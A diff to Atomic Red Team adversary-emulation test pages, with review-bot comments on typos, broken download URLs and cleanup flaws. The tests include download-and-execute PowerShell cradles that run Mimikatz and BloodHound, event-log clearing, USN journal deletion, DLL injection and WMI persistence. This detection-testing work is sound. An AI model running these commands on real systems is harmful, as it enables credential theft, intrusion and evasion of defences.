+##### Description: A file must exist on disk at specified location (#{weak_permission_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{weak_permission_file} -Force | Out-Null
+Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file"
+```
+##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{malicious_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null
+New-Item #{malicious_file} -Force | Out-Null
+Set-Content -Path #{malicious_file} -Value "T1044 Malicious file"
```
-
-
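Review bot: dropping the `get-acl ... | findstr "FullControl"` line means the test no longer inspects permissions at all; it now copies one file the prereq created into another file the prereq created in `$env:TEMP`, which succeeds for every user and exercises no permission weakness. Keep a `Get-Acl #{weak_permission_file}` step, or have the Get Prereq command set an explicitly permissive ACL on the target so the copy reflects the technique. `Get-WmiObject win32_service | select PathName` is left in as a discovery step but its output is unused.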
diff --git a/Atomic_Threat_Coverage/Triggers/T1047.md b/Atomic_Threat_Coverage/Triggers/T1047.md
index c310402..b8bc021 100644
--- a/Atomic_Threat_Coverage/Triggers/T1047.md
+++ b/Atomic_Threat_Coverage/Triggers/T1047.md
@@ -154,7 +154,7 @@ wmic process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
-wmic process where name='#{process_to_execute}' delete
+wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
@@ -190,7 +190,7 @@ wmic /node:"#{node}" process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
-wmic /node:"#{node}" process where name='#{process_to_execute}' delete
+wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1050.md b/Atomic_Threat_Coverage/Triggers/T1050.md
index 9322118..9b495cd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1050.md
+++ b/Atomic_Threat_Coverage/Triggers/T1050.md
@@ -6,15 +6,15 @@ Adversaries may install a new service that can be configured to execute at start
## Atomic Tests
-- [Atomic Test #1 - Service Installation](#atomic-test-1---service-installation)
+- [Atomic Test #1 - Service Installation CMD](#atomic-test-1---service-installation-cmd)
- [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell)
-## Atomic Test #1 - Service Installation
-Installs A Local Service.
+## Atomic Test #1 - Service Installation CMD
+Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
@@ -67,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Service Installation PowerShell
Installs A Local Service via PowerShell.
-Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will output via stdout.
+Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
**Supported Platforms:** Windows
@@ -85,7 +85,7 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
```powershell
-New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
+New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1055.md b/Atomic_Threat_Coverage/Triggers/T1055.md
index 8fc773c..6f98eef 100644
--- a/Atomic_Threat_Coverage/Triggers/T1055.md
+++ b/Atomic_Threat_Coverage/Triggers/T1055.md
@@ -27,15 +27,13 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
-- [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)
+- [Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-2---shared-library-injection-via-etcldsopreload)
-- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
+- [Atomic Test #3 - Shared Library Injection via LD_PRELOAD](#atomic-test-3---shared-library-injection-via-ld_preload)
-- [Atomic Test #4 - Shared Library Injection via LD_PRELOAD](#atomic-test-4---shared-library-injection-via-ld_preload)
+- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
-- [Atomic Test #5 - Process Injection via C#](#atomic-test-5---process-injection-via-c)
-
-- [Atomic Test #6 - svchost writing a file to a UNC path](#atomic-test-6---svchost-writing-a-file-to-a-unc-path)
+- [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path)
@@ -43,7 +41,7 @@ Malware commonly utilizes process injection to access system resources through w
## Atomic Test #1 - Process Injection via mavinject.exe
Windows 10 Utility To Inject DLLS.
-Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
**Supported Platforms:** Windows
@@ -86,41 +84,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
-## Atomic Test #2 - Process Injection via PowerSploit
-PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
-
-Upon successful execution, powershell.exe will download `Invoke-DLLInjection.ps1` and use it to inject into the `T1055.dll` shared library file.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| dll_payload | DLL to Inject | Path | T1055.dll|
-| process_id | PID of input_arguments | Integer | (get-process spoolsv).id|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-$mypid = #{process_id}
-Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
-This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
+## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload
+This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload.
@@ -150,7 +115,7 @@ echo #{path_to_shared_library} > /etc/ld.so.preload
-## Atomic Test #4 - Shared Library Injection via LD_PRELOAD
+## Atomic Test #3 - Shared Library Injection via LD_PRELOAD
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
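Review bot: the unchanged context line under the renamed heading says LD_PRELOAD loads "the shared object library `/etc/ld.so.preload`"; the command in this test is `LD_PRELOAD=#{path_to_shared_library} ls`, so it loads `#{path_to_shared_library}`, and `/etc/ld.so.preload` belongs to the previous test. Worth fixing while the heading is being touched.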
@@ -181,7 +146,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
-## Atomic Test #5 - Process Injection via C#
+## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
@@ -218,9 +183,9 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
-## Atomic Test #6 - svchost writing a file to a UNC path
+## Atomic Test #5 - svchost writing a file to a UNC path
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
-Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
+Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1063.md b/Atomic_Threat_Coverage/Triggers/T1063.md
index 3720830..852b8c3 100644
--- a/Atomic_Threat_Coverage/Triggers/T1063.md
+++ b/Atomic_Threat_Coverage/Triggers/T1063.md
@@ -29,6 +29,9 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a
## Atomic Test #1 - Security Software Discovery
Methods to identify Security Software on an endpoint
+when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
+and specific security software.
+
**Supported Platforms:** Windows
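Review bot: "sucessfully" should be "successfully" and the sentence should start with a capital letter; the same spelling appears in every description line this file adds.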
@@ -39,7 +42,7 @@ Methods to identify Security Software on an endpoint
```cmd
-netsh.exe advfirewall firewall show all profiles
+netsh.exe advfirewall show allprofiles
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
@@ -58,6 +61,8 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell
Methods to identify Security Software on an endpoint
+when sucessfully executed, powershell is going to processes related AV products if they are running.
+
**Supported Platforms:** Windows
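Review bot: the added sentence is missing its verb, "powershell is going to processes related AV products" should read something like "PowerShell is going to display processes related to AV products if they are running"; "sucessfully" as before.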
@@ -84,6 +89,7 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps
Methods to identify Security Software on an endpoint
+when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ).
**Supported Platforms:** Linux, macOS
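Review bot: "display AV software it is running( Little snitch or carbon black )" needs the spacing fixed and the product names written as Little Snitch and Carbon Black; "sucessfully" as before.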
@@ -110,6 +116,8 @@ ps aux | grep CbOsxSensorService
## Atomic Test #4 - Security Software Discovery - Sysmon Service
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
+
**Supported Platforms:** Windows
@@ -134,6 +142,8 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
Discovery of installed antivirus products via a WMI query.
+when sucessfully executed, the test is going to display installed AV software.
+
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1064.md b/Atomic_Threat_Coverage/Triggers/T1064.md
index 3c0bfaf..06dacd6 100644
--- a/Atomic_Threat_Coverage/Triggers/T1064.md
+++ b/Atomic_Threat_Coverage/Triggers/T1064.md
@@ -43,7 +43,7 @@ sh /tmp/art.sh
## Atomic Test #2 - Create and Execute Batch Script
-Creates and executes a simple batch script.
+Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
**Supported Platforms:** Windows
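Review bot: "launh" should be "launch".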
@@ -54,24 +54,36 @@ Creates and executes a simple batch script.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
-| script_to_create | Path of script to create. | path | C:\Windows\TEMP\execute.bat|
+| script_path | Path of script to create. | path | $env:TEMP\T1064_script.bat|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
-C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
+```powershell
+Start-Process #{script_path}
```
#### Cleanup Commands:
-```cmd
-del #{script_to_create} >nul 2>&1
+```powershell
+Remove-Item #{script_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: Batch file must exist on disk at specified location (#{script_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{script_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{script_path} -Force | Out-Null
+Set-Content -Path #{script_path} -Value "#{command_to_execute}"
+```
+
+
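Review bot: `Start-Process #{script_path}` returns immediately, so the cleanup `Remove-Item #{script_path}` can run before the spawned cmd has finished executing the batch file; use `Start-Process #{script_path} -Wait`. Note also that the explicit `C:\Windows\system32\cmd.exe /Q /c` invocation is gone, so anything keyed on that command line for detection should be re-validated against what the new launch actually produces.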
diff --git a/Atomic_Threat_Coverage/Triggers/T1065.md b/Atomic_Threat_Coverage/Triggers/T1065.md
index 73d8f6b..fe1a98f 100644
--- a/Atomic_Threat_Coverage/Triggers/T1065.md
+++ b/Atomic_Threat_Coverage/Triggers/T1065.md
@@ -12,7 +12,8 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell
-Testing uncommonly used port utilizing PowerShell
+Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful
+port check will be displayed.
**Supported Platforms:** Windows
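Review bot: "exectuion" should be "execution".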
@@ -30,7 +31,7 @@ Testing uncommonly used port utilizing PowerShell
```powershell
-test-netconnection -ComputerName #{domain} -port #{port}
+Test-NetConnection -ComputerName #{domain} -port #{port}
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1069.md b/Atomic_Threat_Coverage/Triggers/T1069.md
index 32591d6..5761eab 100644
--- a/Atomic_Threat_Coverage/Triggers/T1069.md
+++ b/Atomic_Threat_Coverage/Triggers/T1069.md
@@ -60,7 +60,8 @@ groups
## Atomic Test #2 - Basic Permission Groups Discovery Windows
-Basic Permission Groups Discovery for Windows
+Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
+information will be displayed.
**Supported Platforms:** Windows
@@ -86,7 +87,8 @@ net group "domain admins" /domain
## Atomic Test #3 - Permission Groups Discovery PowerShell
-Permission Groups Discovery utilizing PowerShell
+Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
+information will be displayed.
**Supported Platforms:** Windows
@@ -116,7 +118,8 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #4 - Elevated group enumeration using net group
-Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups
+Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
+test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1070.md b/Atomic_Threat_Coverage/Triggers/T1070.md
index f399875..e436fef 100644
--- a/Atomic_Threat_Coverage/Triggers/T1070.md
+++ b/Atomic_Threat_Coverage/Triggers/T1070.md
@@ -38,7 +38,7 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
## Atomic Test #1 - Clear Logs
-Upon execution this test will clear Windows Event Logs
+Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
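Review bot: "verify that it is now empty" by opening `System.evtx` under `C:\Windows\System32\winevt\Logs` is not a reliable check, since the .evtx file is rewritten rather than emptied and the test's `#{log_name}` is not necessarily System. Suggest verifying with `wevtutil qe #{log_name} /c:1` or by viewing the log in Event Viewer.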
@@ -67,7 +67,8 @@ wevtutil cl #{log_name}
## Atomic Test #2 - FSUtil
-Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
+Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output
+will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
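Review bot: "exectuion" should be "execution".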
@@ -82,6 +83,10 @@ Manages the update sequence number (USN) change journal, which provides a persis
fsutil usn deletejournal /D C:
```
+#### Cleanup Commands:
+```cmd
+fsutil usn createjournal m=1000 a=100 c:
+```
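Review bot: `fsutil usn createjournal m=1000 a=100 c:` recreates the journal with a 1000-byte maximum size and 100-byte allocation delta, which does not restore the previous configuration. Capture `fsutil usn queryjournal c:` before the `deletejournal` and recreate with the recorded Maximum Size and Allocation Delta; deleting and recreating also gives the journal a new ID, so consumers that track changes through it have to rescan, which is worth stating in the description.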
@@ -174,7 +179,9 @@ echo 0> #{log_path}
## Atomic Test #6 - Delete System Logs Using PowerShell
-Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
+Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
+Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
+When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created.
**Supported Platforms:** Windows
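Review bot: "get's" should be "gets", and `Security.evtx` is a file, not a folder; the sentence should say the service is restarted and the Security.evtx file is re-created.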
@@ -204,7 +211,8 @@ Start-Service -Name EventLog
## Atomic Test #7 - Delete System Logs Using Clear-EventLogId
-Clear event logs using built-in PowerShell commands
+Clear event logs using built-in PowerShell commands.
+Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1073.md b/Atomic_Threat_Coverage/Triggers/T1073.md
index 7d5becc..0d52623 100644
--- a/Atomic_Threat_Coverage/Triggers/T1073.md
+++ b/Atomic_Threat_Coverage/Triggers/T1073.md
@@ -12,7 +12,8 @@ Adversaries likely use this technique as a means of masking actions they perform
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
-GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
+GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
+Upon execution, calc.exe will be opened.
**Supported Platforms:** Windows
@@ -23,13 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
+| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1073\bin\GUP.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
-$PathToAtomicsFolder\T1073\bin\GUP.exe
+#{gup_executable}
```
#### Cleanup Commands:
@@ -39,6 +41,19 @@ taskkill /F /IM #{process_name}
+#### Dependencies: Run with `powershell`!
+##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"
+```
+
+
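Review bot: the Get Prereq URL uses `/blob/master/`, which serves the GitHub HTML page, not the binary, so `#{gup_executable}` would be an HTML file; the other prereq downloads in this patch use `https://github.com/redcanaryco/atomic-red-team/raw/master/...`. The prereq also only fetches GUP.exe, while the description says the test works by loading the libcurl dll beside it; the check and download should cover that dll too or the side-load has nothing to load.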
diff --git a/Atomic_Threat_Coverage/Triggers/T1074.md b/Atomic_Threat_Coverage/Triggers/T1074.md
index f1d4dfa..013cd8d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1074.md
+++ b/Atomic_Threat_Coverage/Triggers/T1074.md
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Test #1 - Stage data from Discovery.bat
-Utilize powershell to download discovery.bat and save to a local file
+Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat|
+
#### Attack Commands: Run with `powershell`!
```powershell
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
+#### Cleanup Commands:
+```powershell
+Remove-Item -Force #{output_file} -ErrorAction Ignore
+```
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
-Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
+Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+was placed in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip|
+| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip|
+
#### Attack Commands: Run with `powershell`!
```powershell
-Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
+Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
-Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
+Remove-Item -Path #{output_file} -ErrorAction Ignore
```
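Review bot: `#{input_file}` has no Dependencies block, so `Compress-Archive -Path #{input_file}` fails when `PathToAtomicsFolder\T1074\bin\Folder_to_zip` is absent; add Check/Get Prereq commands for it as the T1064 and T1073 hunks in this patch do. Minor: "Verify" mid-sentence should be lower-case.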
diff --git a/Atomic_Threat_Coverage/Triggers/T1083.md b/Atomic_Threat_Coverage/Triggers/T1083.md
index 8a89d44..a7cd04e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1083.md
+++ b/Atomic_Threat_Coverage/Triggers/T1083.md
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the ls
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+all of the data discovery commands.
**Supported Platforms:** Windows
@@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
-dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1084.md b/Atomic_Threat_Coverage/Triggers/T1084.md
index 6f555bf..9d6fd38 100644
--- a/Atomic_Threat_Coverage/Triggers/T1084.md
+++ b/Atomic_Threat_Coverage/Triggers/T1084.md
@@ -4,15 +4,14 @@
## Atomic Tests
-- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
+- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-## Atomic Test #1 - Persistence
-Run from an administrator powershell window
-
-After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+## Atomic Test #1 - Persistence via WMI Event Subscription
+Run from an administrator powershell window. After running, reboot the victim machine.
+After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
diff --git a/Atomic_Threat_Coverage/Triggers/T1085.md b/Atomic_Threat_Coverage/Triggers/T1085.md
index 3c49523..7997325 100644
--- a/Atomic_Threat_Coverage/Triggers/T1085.md
+++ b/Atomic_Threat_Coverage/Triggers/T1085.md
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
-Test execution of a remote script using rundll32.exe
+Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
@@ -129,6 +129,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll.
+Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
@@ -172,7 +173,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution
-Test execution of a command using rundll32.exe with syssetup.dll.
+Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
@@ -216,7 +217,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution
-Test execution of a command using rundll32.exe with setupapi.dll.
+Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
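Review bot: typo in the added description: "a windows saying" should read "a window saying", matching the wording used for the syssetup.dll test in the hunk above.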
diff --git a/Atomic_Threat_Coverage/Triggers/T1086.md b/Atomic_Threat_Coverage/Triggers/T1086.md
index 4bfaefc..5366ecf 100644
--- a/Atomic_Threat_Coverage/Triggers/T1086.md
+++ b/Atomic_Threat_Coverage/Triggers/T1086.md
@@ -22,29 +22,27 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
-- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
+- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
-- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
+- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
-- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
-- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
+- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
-- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
+- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
-- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
+- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
-- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
+- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
-- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
-
-- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
## Atomic Test #1 - Mimikatz
-Download Mimikatz and dump credentials
+Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
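Review bot: removing Atomic Test #6 (PowerShell Add User) shifts every later T1086 test number down by one (#7 becomes #6 through #14 becoming #13). Anything that references these tests by number, such as detection-rule or analytics mappings keyed to T1086 test indices, must be updated in the same change, otherwise they silently point at the wrong test.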
@@ -75,7 +73,7 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - BloodHound
Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
-and then compress and store the data to the temp directory on the machine
+and then compress and store the data to the temp directory on the machine
**Supported Platforms:** Windows
@@ -88,13 +86,17 @@ and then compress and store the data to the temp directory on the machine
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
```
